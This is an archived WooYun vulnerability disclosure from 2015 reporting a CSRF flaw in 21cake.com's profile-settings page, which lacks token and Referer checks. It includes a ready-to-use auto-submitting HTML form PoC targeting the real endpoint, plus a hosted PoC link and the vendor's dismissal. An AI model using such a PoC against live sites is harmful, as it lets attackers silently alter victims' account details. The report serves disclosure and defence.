乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-01: 细节已通知厂商并且等待厂商处理中 2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开
csrf
修改个人信息处无token和refer验证。
构造poc
<html> <body> <form action="http://www.21cake.com/member-save_setting.html" method="POST"> <input type="hidden" name="contact[name]" value="wooyun" /> <input type="hidden" name="profile[gender]" value="male" /> <input type="hidden" name="contact[phone][mobile]" value="13058667041" /> <input type="hidden" name="mobile[check]" value="" /> <input type="hidden" name="contact[email]" value="cao@nimabi.cf" /> <input type="hidden" name="contact[area]" value="mainland:?Œ—?o¬/?Œ—?o¬?¸‚/?œé˜³?Œo/?o”?ޝ?†…:3284" /> <input type="hidden" name="profile[birthday]" value="2015-08-26" /> <input type="hidden" name="profile[family_type]" value="1" /> <input type="hidden" name="profile[family_birthday]" value="2015-09-01" /> <input type="hidden" name="interest" value="18" /> <input type="submit" value="Submit request" /> </form> </body></html>
poc地址:http://xss.gift/21cakecsrf.html
加token
危害等级:无影响厂商忽略
忽略时间:2015-09-06 15:02
漏洞Rank:4 (WooYun评价)
暂无